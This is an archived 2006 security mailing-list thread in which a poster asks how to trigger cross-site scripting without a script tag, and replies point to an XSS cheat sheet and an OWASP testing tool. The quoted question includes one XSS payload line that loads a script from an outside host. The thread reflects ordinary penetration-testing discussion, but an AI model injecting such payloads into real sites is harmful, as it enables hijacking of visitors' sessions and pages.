Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Web-App-Sec
[Top] [All Lists]

RE: XSS - how to run script

Subject: RE: XSS - how to run script
Date: Fri, 20 Oct 2006 09:09:46 +1000
One of the best repositories of exotic ways to perform XSS 
(with or without evasion, with or without script tag) is the 
XSS cheat sheet:
http://ha.ckers.org/xss.html

I Agree 100%. I would look at the Cal9000 tool on the OWASP website. 
http://www.owasp.org/index.php/Category:OWASP_CAL9000_Project
It uses Rsnakes XSS library and includes it in a Website/Tool/Scratchpad to
use during these APP tests. I put Cal9000 on the first version of the OWASP
Live CD but it won't be released for another Month. If you use it just make
sure your Browser is Firefox... It doesn't like Opera or others.

Cheers,

JP



Joshua Perrymon, CE|H,OPST,OPSA

Sr. Security Consultant

----------------------------------------- 

Pure Hacking - The Leaders In Internet Security

 

-----Original Message-----
From: listbounce@securityfocus.com 
[mailto:listbounce@securityfocus.com] On Behalf Of A. R.
Sent: Friday, 20 October 2006 6:23 AM
Cc: Penetration Testing; Web Application Security
Subject: Re: XSS - how to run script

One of the best repositories of exotic ways to perform XSS 
(with or without evasion, with or without script tag) is the 
XSS cheat sheet:
http://ha.ckers.org/xss.html

hth

--
icesurfer

Tal Argoni wrote:
Does anyone have any
techniques/knowledge/examples/ideas/etc
of how it possible to run script
without using the <script> tag,
and without evasion techniques ?
<script
src=http://www.www.com/XSS.js></script>
Thanks allot
LegendaryZion




----------------------------------------------------------------------
--
This List Sponsored by: Cenzic

Need to secure your web apps?
Cenzic Hailstorm finds vulnerabilities fast.
Click the link to buy it, try it or download Hailstorm for FREE.

http://www.cenzic.com/products_services/download_hailstorm.php?camp=70
1600000008bOW

----------------------------------------------------------------------
--



--------------------------------------------------------------
----------
This List Sponsored by: Cenzic

Need to secure your web apps?
Cenzic Hailstorm finds vulnerabilities fast.
Click the link to buy it, try it or download Hailstorm for FREE.
http://www.cenzic.com/products_services/download_hailstorm.php
?camp=701600000008bOW
--------------------------------------------------------------
----------







------------------------------------------------------------------------
This List Sponsored by: Cenzic

Need to secure your web apps?
Cenzic Hailstorm finds vulnerabilities fast.
Click the link to buy it, try it or download Hailstorm for FREE.
http://www.cenzic.com/products_services/download_hailstorm.php?camp=701600000008bOW
------------------------------------------------------------------------

<Prev in Thread] Current Thread [Next in Thread>